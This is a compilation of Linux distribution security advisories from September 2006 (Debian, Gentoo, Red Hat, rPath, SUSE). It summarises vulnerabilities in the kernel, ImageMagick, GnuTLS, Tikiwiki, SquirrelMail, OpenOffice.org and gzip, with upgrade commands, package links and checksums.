Debian GNU/Linux
Debian Security Advisory DSA 1184-2 [email protected]
http://www.debian.org/security/
Dann Frazier
September 26th, 2006 http://www.debian.org/security/faq
Package : kernel-source-2.6.8
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE IDs : CVE-2004-2660 CVE-2005-4798 CVE-2006-1052 CVE-2006-1343
CVE-2006-1528 CVE-2006-1855 CVE-2006-1856 CVE-2006-2444
CVE-2006-2446 CVE-2006-2935 CVE-2006-2936 CVE-2006-3468
CVE-2006-3745 CVE-2006-4093 CVE-2006-4145 CVE-2006-4535
CERT advisory : VU#681569
BugTraq IDs : 17203 17830 18081 18099 18101 18105 18847 19033 19396
19562 19615 19666 20087
This advisory covers the S/390 components of the recent security
update for the Linux 2.6.8 kernel that was missing due to technical
problems. For reference below please see the original advisory
text.
Several security related problems have been discovered in the
Linux kernel which may lead to a denial of service or even the
execution of arbitrary code. The Common Vulnerabilities and
Exposures project identifies the following problems:
CVE-2004-2660
Toshihiro Iwamoto discovered a memory leak in the handling of
direct I/O writes that allows local users to cause a denial of
service.
CVE-2005-4798
A buffer overflow in NFS readlink handling allows a malicious
remote server to cause a denial of service.
CVE-2006-1052
Stephen Smalley discovered a bug in the SELinux ptrace handling
that allows local users with ptrace permissions to change the
tracer SID to the SID of another process.
CVE-2006-1343
Pavel Kankovsky discovered an information leak in the getsockopt
system call which can be exploited by a local program to leak
potentially sensitive memory to userspace.
CVE-2006-1528
Douglas Gilbert reported a bug in the sg driver that allows
local users to cause a denial of service by performing direct I/O
transfers from the sg driver to memory mapped I/O space.
CVE-2006-1855
Mattia Belletti noticed that certain debugging code left in the
process management code could be exploited by a local attacker to
cause a denial of service.
CVE-2006-1856
Kostik Belousov discovered a missing LSM file_permission check
in the readv and writev functions which might allow attackers to
bypass intended access restrictions.
CVE-2006-2444
Patrick McHardy discovered a bug in the SNMP NAT helper that
allows remote attackers to cause a denial of service.
CVE-2006-2446
A race condition in the socket buffer handling allows remote
attackers to cause a denial of service.
CVE-2006-2935
Diego Calleja Garcia discovered a buffer overflow in the DVD
handling code that could be exploited by a specially crafted DVD or
USB storage device to execute arbitrary code.
CVE-2006-2936
A bug in the serial USB driver has been discovered that could be
exploited by a custom made USB serial adapter to consume arbitrary
amounts of memory.
CVE-2006-3468
James McKenzie discovered a denial of service vulnerability in
the NFS driver. When exporting an ext3 file system over NFS, a
remote attacker could exploit this to trigger a file system panic
by sending a specially crafted UDP packet.
CVE-2006-3745
Wei Wang discovered a bug in the SCTP implementation that allows
local users to cause a denial of service and possibly gain root
privileges.
CVE-2006-4093
Olof Johansson discovered that the kernel did not disable the
HID0 bit on PowerPC 970 processors which could be exploited by a
local attacker to cause a denial of service.
CVE-2006-4145
A bug in the Universal Disk Format (UDF) filesystem driver could
be exploited by a local user to cause a denial of service.
CVE-2006-4535
David Miller reported a problem with the fix for CVE-2006-3745
that allows local users to crash the system using via an SCTP
socket with a certain SO_LINGER value.
The following matrix explains which kernel version for which
architecture fixes the problem mentioned above:
| stable (sarge) | |
| Source | 2.6.8-16sarge5 |
| Alpha architecture | 2.6.8-16sarge5 |
| AMD64 architecture | 2.6.8-16sarge5 |
| HP Precision architecture | 2.6.8-6sarge5 |
| Intel IA-32 architecture | 2.6.8-16sarge5 |
| Intel IA-64 architecture | 2.6.8-14sarge5 |
| Motorola 680×0 architecture | 2.6.8-4sarge5 |
| PowerPC architecture | 2.6.8-12sarge5 |
| IBM S/390 | 2.6.8-5sarge5 |
| Sun Sparc architecture | 2.6.8-15sarge5 |
| FAI | 1.9.1sarge4 |
Due to some internal problems kernel packages for the S/390 are
missing and will be provided later.
For the unstable distribution (sid) these problems have been
fixed in version 2.6.18-1.
We recommend that you upgrade your kernel package and reboot the
machine. If you have built a custom kernel from the kernel source
package, you will need to rebuild to take advantage of these
fixes.
Upgrade Instructions
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:
apt-get update
will update the internal database apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge
Source archives:
Size/MD5 checksum: 846
1bcc93834f3d4ae2a83731ba2dab444c
http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-5sarge5.tar.gz
Size/MD5 checksum: 13994
feb0f938746f52cf80597ef8ff5691fc
Architecture independent components:
Size/MD5 checksum: 12084
ab2e51bb8bbbbfcc392b725f955f96c0
IBM S/390 architecture:
Size/MD5 checksum: 5087410
92c4b60e889e92f05f30214020b50955
http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390_2.6.8-5sarge5_s390.deb
Size/MD5 checksum: 2981914
f71d20cba548768ee4e44ffe28be947d
http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390-tape_2.6.8-5sarge5_s390.deb
Size/MD5 checksum: 1144574
7e3ae52a9d115cdca1c79d3946cd4e6c
http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390x_2.6.8-5sarge5_s390.deb
Size/MD5 checksum: 3189746
f1bd52a536ae5a13427c8b935bd81434
These files will probably be moved into the stable distribution
on its next update.
For apt-get: deb http://security.debian.org/
stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security
dists/stable/updates/main
Mailing list: [email protected]
Package info: `apt-cache show <pkg>’ and http://packages.debian.org/<pkg>
Gentoo Linux
Gentoo Linux Security Advisory GLSA 200609-14
Severity: Normal
Title: ImageMagick: Multiple Vulnerabilities
Date: September 26, 2006
Bugs: #144091, #143533
ID: 200609-14
Synopsis
Multiple buffer overflows have been discovered in ImageMagick,
which could potentially result in the execution of arbitrary
code.
Background
ImageMagick is a free software suite to manipulate, convert, and
create many image formats.
Affected packages
Package / Vulnerable / Unaffected
1 media-gfx/imagemagick < 6.2.9.5 >= 6.2.9.5
Description
Tavis Ormandy of the Google Security Team discovered a stack and
heap buffer overflow in the GIMP XCF Image decoder and multiple
heap and integer overflows in the SUN bitmap decoder. Damian Put
discovered a heap overflow in the SGI image decoder.
Impact
An attacker may be able to create a specially crafted image
that, when processed with ImageMagick, executes arbitrary code with
the privileges of the executing user.
Workaround
There is no known workaround at this time.
Resolution
All ImageMagick users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-gfx/imagemagick-6.2.9.5"
References
[ 1 ] CVE-2006-3743
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3743
[ 2 ] CVE-2006-3744
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3744
[ 3 ] CVE-2006-4144
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4144
Availability
This GLSA and any updates to it are available for viewing at the
Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200609-14.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[email protected] or
alternatively, you may file a bug at http://bugs.gentoo.org.
License
Copyright 2006 Gentoo Foundation, Inc; referenced text belongs
to its owner(s).
The contents of this document are licensed under the Creative
Commons – Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Gentoo Linux Security Advisory GLSA 200609-15
Severity: Normal
Title: GnuTLS: RSA Signature Forgery
Date: September 26, 2006
Bugs: #147682
ID: 200609-15
Synopsis
GnuTLS fails to handle excess data which could allow an attacker
to forge a PKCS #1 v1.5 signature.
Background
GnuTLS is an implementation of SSL 3.0 and TLS 1.0.
Affected packages
Package / Vulnerable / Unaffected
1 net-libs/gnutls < 1.4.4 >= 1.4.4
Description
verify.c fails to properly handle excess data in
digestAlgorithm.parameters field while generating a hash when using
an RSA key with exponent 3. RSA keys that use exponent 3 are
commonplace.
Impact
Remote attackers could forge PKCS #1 v1.5 signatures that are
signed with an RSA key, preventing GnuTLS from correctly verifying
X.509 and other certificates that use PKCS.
Workaround
There is no known workaround at this time.
Resolution
All GnuTLS users should update both packages:
# emerge --sync
# emerge --update --ask --verbose ">=net-libs/gnutls-1.4.4"
References
[ 1 ] CVE-2006-4790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4790
Availability
This GLSA and any updates to it are available for viewing at the
Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200609-15.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[email protected] or
alternatively, you may file a bug at http://bugs.gentoo.org.
License
Copyright 2006 Gentoo Foundation, Inc; referenced text belongs
to its owner(s).
The contents of this document are licensed under the Creative
Commons – Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Gentoo Linux Security Advisory GLSA 200609-16
Severity: High
Title: Tikiwiki: Arbitrary command execution
Date: September 26, 2006
Bugs: #145714
ID: 200609-16
Synopsis
Tikiwiki contains a cross-site scripting (XSS) vulnerability as
well as a second vulnerability which may allow remote execution of
arbitrary code.
Background
Tikiwiki is a web-based groupware and content management system,
developed with PHP, ADOdb and Smarty.
Affected packages
Package / Vulnerable / Unaffected
1 www-apps/tikiwiki < 1.9.5 >= 1.9.5
Description
A vulnerability in jhot.php allows for an unrestricted file
upload to the img/wiki/ directory. Additionally, an XSS exists in
the highlight parameter of tiki-searchindex.php.
Impact
An attacker could execute arbitrary code with the rights of the
user running the web server by uploading a file and executing it
via a filepath parameter. The XSS could be exploited to inject and
execute malicious script code or to steal cookie-based
authentication credentials, potentially compromising the victim’s
browser.
Workaround
There is no known workaround at this time.
Resolution
All Tikiwiki users should upgrade to the latest version:
# emerge --sync
# emerge --oneshot --verbose --ask ">=www-apps/tikiwiki-1.9.5"
References
[ 1 ] CVE-2006-4299
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4299
[ 2 ] CVE-2006-4602
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4602
Availability
This GLSA and any updates to it are available for viewing at the
Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200609-16.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[email protected] or
alternatively, you may file a bug at http://bugs.gentoo.org.
License
Copyright 2006 Gentoo Foundation, Inc; referenced text belongs
to its owner(s).
The contents of this document are licensed under the Creative
Commons – Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Red Hat Linux
Red Hat Security Advisory
Synopsis: Moderate: squirrelmail security update
Advisory ID: RHSA-2006:0668-01
Advisory URL: https://rhn.redhat.com/errata/RHSA-2006-0668.html
Issue date: 2006-09-26
Updated on: 2006-09-26
Product: Red Hat Enterprise Linux
CVE Names: CVE-2006-4019
1. Summary:
A new squirrelmail package that fixes a security issue as well
as several bugs is now available for Red Hat Enterprise Linux 3 and
4.
This update has been rated as having moderate security impact by
the Red Hat Security Response Team.
2. Relevant releases/architectures:
Red Hat Enterprise Linux AS version 3 – noarch
Red Hat Desktop version 3 – noarch
Red Hat Enterprise Linux ES version 3 – noarch
Red Hat Enterprise Linux WS version 3 – noarch
Red Hat Enterprise Linux AS version 4 – noarch
Red Hat Enterprise Linux Desktop version 4 – noarch
Red Hat Enterprise Linux ES version 4 – noarch
Red Hat Enterprise Linux WS version 4 – noarch
3. Problem description:
SquirrelMail is a standards-based webmail package written in
PHP.
A dynamic variable evaluation flaw was found in SquirrelMail.
Users who have an account on a SquirrelMail server and are logged
in could use this flaw to overwrite variables which may allow them
to read or write other users’ preferences or attachments.
(CVE-2006-4019)
Users of SquirrelMail should upgrade to this erratum package,
which contains SquirrelMail 1.4.8 to correct this issue. This
package also contains a number of additional patches to correct
various bugs.
Note: After installing this update, users are advised to restart
their httpd service to ensure that the new version functions
correctly.
4. Solution:
Before applying this update, make sure all previously released
errata relevant to your system have been applied.
This update is available via Red Hat Network. To use Red Hat
Network, launch the Red Hat Update Agent with the following
command:
up2date
This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.
5. Bug IDs fixed (http://bugzilla.redhat.com/):
192236 – [Squirrelmail] sqspell_config.php not listed as a
config file
194457 – squirrelmail cannot handle handle multibyte characters in
attachment.
194598 – “Message Highlighting” help not translated in ja_JP
194599 – ja_JP help pages are garbled
195452 – squirrelmail view_text.php cannot handle handle multibyte
characters in attachment.
195639 – Squirrelmail file download issue on JP MS Windows XP.
196017 – squirrelmail cannot convert Subject to zen-kaku
kata-kana.
196117 – Wrong ja_JP translation for “refresh folder list”
202195 – CVE-2006-4019 Squirrelmail authenticated user variable
overwriting
6. RPMs required:
Red Hat Enterprise Linux AS version 3:
SRPMS:
ftp://updates.redhat.com/enterprise/3AS/en/os/SRPMS/squirrelmail-1.4.8-2.el3.src.rpm
ab9d7fa0864948074a24fbb0fac716e5
squirrelmail-1.4.8-2.el3.src.rpm
noarch:
0f4921da7a788f633aa016f993a9a9b6
squirrelmail-1.4.8-2.el3.noarch.rpm
Red Hat Desktop version 3:
SRPMS:
ftp://updates.redhat.com/enterprise/3desktop/en/os/SRPMS/squirrelmail-1.4.8-2.el3.src.rpm
ab9d7fa0864948074a24fbb0fac716e5
squirrelmail-1.4.8-2.el3.src.rpm
noarch:
0f4921da7a788f633aa016f993a9a9b6
squirrelmail-1.4.8-2.el3.noarch.rpm
Red Hat Enterprise Linux ES version 3:
SRPMS:
ftp://updates.redhat.com/enterprise/3ES/en/os/SRPMS/squirrelmail-1.4.8-2.el3.src.rpm
ab9d7fa0864948074a24fbb0fac716e5
squirrelmail-1.4.8-2.el3.src.rpm
noarch:
0f4921da7a788f633aa016f993a9a9b6
squirrelmail-1.4.8-2.el3.noarch.rpm
Red Hat Enterprise Linux WS version 3:
SRPMS:
ftp://updates.redhat.com/enterprise/3WS/en/os/SRPMS/squirrelmail-1.4.8-2.el3.src.rpm
ab9d7fa0864948074a24fbb0fac716e5
squirrelmail-1.4.8-2.el3.src.rpm
noarch:
0f4921da7a788f633aa016f993a9a9b6
squirrelmail-1.4.8-2.el3.noarch.rpm
Red Hat Enterprise Linux AS version 4:
SRPMS:
ftp://updates.redhat.com/enterprise/4AS/en/os/SRPMS/squirrelmail-1.4.8-2.el4.src.rpm
de02b249ec7954627c88123fbdf77e7b
squirrelmail-1.4.8-2.el4.src.rpm
noarch:
5a86f850038d3a2df211c29af5c9070c
squirrelmail-1.4.8-2.el4.noarch.rpm
Red Hat Enterprise Linux Desktop version 4:
SRPMS:
ftp://updates.redhat.com/enterprise/4Desktop/en/os/SRPMS/squirrelmail-1.4.8-2.el4.src.rpm
de02b249ec7954627c88123fbdf77e7b
squirrelmail-1.4.8-2.el4.src.rpm
noarch:
5a86f850038d3a2df211c29af5c9070c
squirrelmail-1.4.8-2.el4.noarch.rpm
Red Hat Enterprise Linux ES version 4:
SRPMS:
ftp://updates.redhat.com/enterprise/4ES/en/os/SRPMS/squirrelmail-1.4.8-2.el4.src.rpm
de02b249ec7954627c88123fbdf77e7b
squirrelmail-1.4.8-2.el4.src.rpm
noarch:
5a86f850038d3a2df211c29af5c9070c
squirrelmail-1.4.8-2.el4.noarch.rpm
Red Hat Enterprise Linux WS version 4:
SRPMS:
ftp://updates.redhat.com/enterprise/4WS/en/os/SRPMS/squirrelmail-1.4.8-2.el4.src.rpm
de02b249ec7954627c88123fbdf77e7b
squirrelmail-1.4.8-2.el4.src.rpm
noarch:
5a86f850038d3a2df211c29af5c9070c
squirrelmail-1.4.8-2.el4.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key
and details on how to verify the signature are available from
https://www.redhat.com/security/team/key/#package
7. References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4019
http://www.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <[email protected]>. More
contact details at https://www.redhat.com/security/team/contact/
Copyright 2006 Red Hat, Inc.
rPath Linux
rPath Security Advisory: 2006-0173-1
Published: 2006-09-26
Products: rPath Linux 1
Rating: Major
Exposure Level Classification: Indirect User Deterministic
Unauthorized Access
Updated Versions:
openoffice.org=/conary.rpath.com@rpl:devel//1/2.0.3-1.6-1
References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2198
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3117
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2199
https://issues.rpath.com/browse/RPL-475
Description:
Previous versions of the openoffice.org packages are susceptible
to several vulnerabilities, including a denial of service
(application crash) and a user-complicit unauthorized access attack
that enables an attacker to cause arbitrary code to be run. These
versions are not susceptible to CVE-2006-2199 because Java is not
enabled in those builds.
Because Java support could not be disabled in the initial
release of OpenOffice.org 2.0.3, and because Java support is not
included within rPath Linux 1, this update was delayed until
non-Java builds were re-enabled in OpenOffice.org.
SUSE Linux
SUSE Security Announcement
Package: gzip
Announcement ID: SUSE-SA:2006:056
Date: Tue, 26 Sep 2006 15:32:33 +0000
Affected Products: SLE SDK 10 SUSE LINUX 10.1 SUSE LINUX 10.0 SUSE
LINUX 9.3 SUSE LINUX 9.2 SuSE Linux Desktop 1.0 SuSE Linux
Enterprise Server 8 SUSE SLES 10 SUSE SLES 9 UnitedLinux 1.0
Vulnerability Type: remote system compromise
Severity (1-10): 6
SUSE Default Package: yes
Cross-References: CVE-2006-4334,CVE-2006-4335,CVE-2006-4336,
CVE-2006-4337,CVE-2006-4338
Content of This Advisory:
- Security Vulnerability Resolved: buffer overflows, infinite
loops Problem Description - Solution or Work-Around
- Special Instructions and Notes
- Package Location and Checksums
- Pending Vulnerabilities, Solutions, and Work-Arounds: none
- Authenticity Verification and Additional Information
1) Problem Description and Brief Discussion
The gzip tool does not handle some specific values correctly
when unpacking archives. This leads to vulnerabilities like buffer
overflows or infinite loops.
Various different programs like mail clients, file explorer,
etc. use gzip and if a user can be deveived to unpack the archive
of an attacker these bugs can lead to remote system compromise.
Thanks to Tavis Ormandy, Google Security Team for informing us
about this issue.
2) Solution or Work-Around
The is no work-around known.
3) Special Instructions and Notes
none
4) Package Location and Checksums
The preferred method for installing security updates is to use
the YaST Online Update (YOU) tool. YOU detects which updates are
required and automatically performs the necessary steps to verify
and install them. Alternatively, download the update packages for
your distribution manually and verify their integrity by the
methods listed in Section 6 of this announcement. Then install the
packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the
filename of the downloaded RPM package.
x86 Platform:
SUSE LINUX 10.1:
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/gzip-1.3.5-159.5.i586.rpm
dc3d0d1fa04f309155188d456339e320
SUSE LINUX 10.0:
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/gzip-1.3.5-144.2.i586.rpm
fa214e77cac58482b03a39aa3637402f
SUSE LINUX 9.3:
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/gzip-1.3.5-140.2.i586.rpm
93c268c56d6f2bfb97fb1362440619ff
SUSE LINUX 9.2:
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/gzip-1.3.5-139.2.i586.rpm
9ce8e3d5dda60f5c0226e1003555e7e3
Power PC Platform:
SUSE LINUX 10.1:
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/gzip-1.3.5-159.5.ppc.rpm
e5216ebf301cc076117d24b1d641d666
SUSE LINUX 10.0:
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/gzip-1.3.5-144.2.ppc.rpm
70fad9dec1124d6e2a18cddb56542e21
x86-64 Platform:
SUSE LINUX 10.1:
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/gzip-1.3.5-159.5.x86_64.rpm
bc88120404ee14a4f85869bf7b664c23
SUSE LINUX 10.0:
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/gzip-1.3.5-144.2.x86_64.rpm
9bac8a94f263b70fcb0188b8fe61b51a
SUSE LINUX 9.3:
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/gzip-1.3.5-140.2.x86_64.rpm
e99894cc66b479b026a8d6ab8f3d4bee
SUSE LINUX 9.2:
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/gzip-1.3.5-139.2.x86_64.rpm
7f58b2c8124e895b5bbbf24e92f5701a
Sources:
SUSE LINUX 10.1:
ftp://ftp.suse.com/pub/suse/update/10.1/rpm/src/gzip-1.3.5-159.5.src.rpm
ccc806bead84a51395e24d03e1b08132
SUSE LINUX 10.0:
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/gzip-1.3.5-144.2.src.rpm
8d38b0719a591ac7c41aa35062ca8f2e
SUSE LINUX 9.3:
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/gzip-1.3.5-140.2.src.rpm
1c7511c702371171e4a940e6c6740c35
SUSE LINUX 9.2:
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/gzip-1.3.5-139.2.src.rpm
81243003d7d3b397d7043a74059c5d7f
Our maintenance customers are notified individually. The
packages are offered for installation from the maintenance web:
http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/c9a04465aadc28a00f8e67df4a55f059.html
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and
on Web sites. The authenticity and integrity of a SUSE security
announcement is guaranteed by a cryptographic signature in each
announcement. All SUSE security announcements are published with a
valid signature.To verify the signature of the announcement, save it as text
into a file and run the commandgpg –verify <file>
replacing <file> with the name of the file where you saved
the announcement. The output for a valid signature looks like:gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from “SuSE Security Team <[email protected]>”where <DATE> is replaced by the date the document was
signed.If the security team’s key is not contained in your key ring,
you can import it from the first installation CD. To import the
key, use the commandgpg –import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers
all over the world. While this service is considered valuable and
important to the free and open source software community, the
authenticity and the integrity of a package needs to be verified to
ensure that it has not been tampered with.There are two verification methods that can be used
independently from each other to prove the authenticity of a
downloaded file or RPM package:- Using the internal gpg signatures of the rpm package
- MD5 checksums as provided in this announcement
- The internal rpm package signatures provide an easy way to
verify the authenticity of an RPM package. Use the commandrpm -v –checksig <file.rpm>
to verify the signature of the package, replacing
<file.rpm> with the filename of the RPM package downloaded.
The package is unmodified if it contains a valid signature from
[email protected] with the key ID
9C800ACA. This key is automatically imported into the RPM database
(on RPMv4-based distributions) and the gpg key ring of ‘root’
during installation. You can also find it on the first installation
CD and at the end of this announcement. - If you need an alternative means of verification, use the
md5sum command to verify the authenticity of the packages. Execute
the commandmd5sum <filename.rpm>
after you downloaded the file from a SUSE FTP server or its
mirrors. Then compare the resulting md5sum with the one that is
listed in the SUSE security announcement. Because the announcement
containing the checksums is cryptographically signed (by [email protected]), the checksums show
proof of the authenticity of the package if the signature of the
announcement is valid. Note that the md5 sums published in the SUSE
Security Announcements are valid for the respective packages only.
Newer versions of these packages cannot be verified.
- SUSE runs two security mailing lists to which any interested
party may subscribe:- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list. To
subscribe, send an e-mail to - SUSE’s announce-only mailing list.
Only SUSE’s security announcements are sent to this list. To
subscribe, send an e-mail to
- General Linux and SUSE security discussion.
For general information or the frequently asked questions (FAQ),
send mail to <[email protected]>
or <[email protected]>.
SUSE’s security contact is <[email protected]> or
<[email protected]>. The
<[email protected]>
public key is listed below.
The information in this advisory may be distributed or
reproduced, provided that the advisory is not modified in any way.
In particular, the clear text signature should show proof of the
authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind
whatsoever with respect to the information contained in this
security advisory.
Type Bits/KeyID Date User ID
pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <[email protected]>
pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <[email protected]>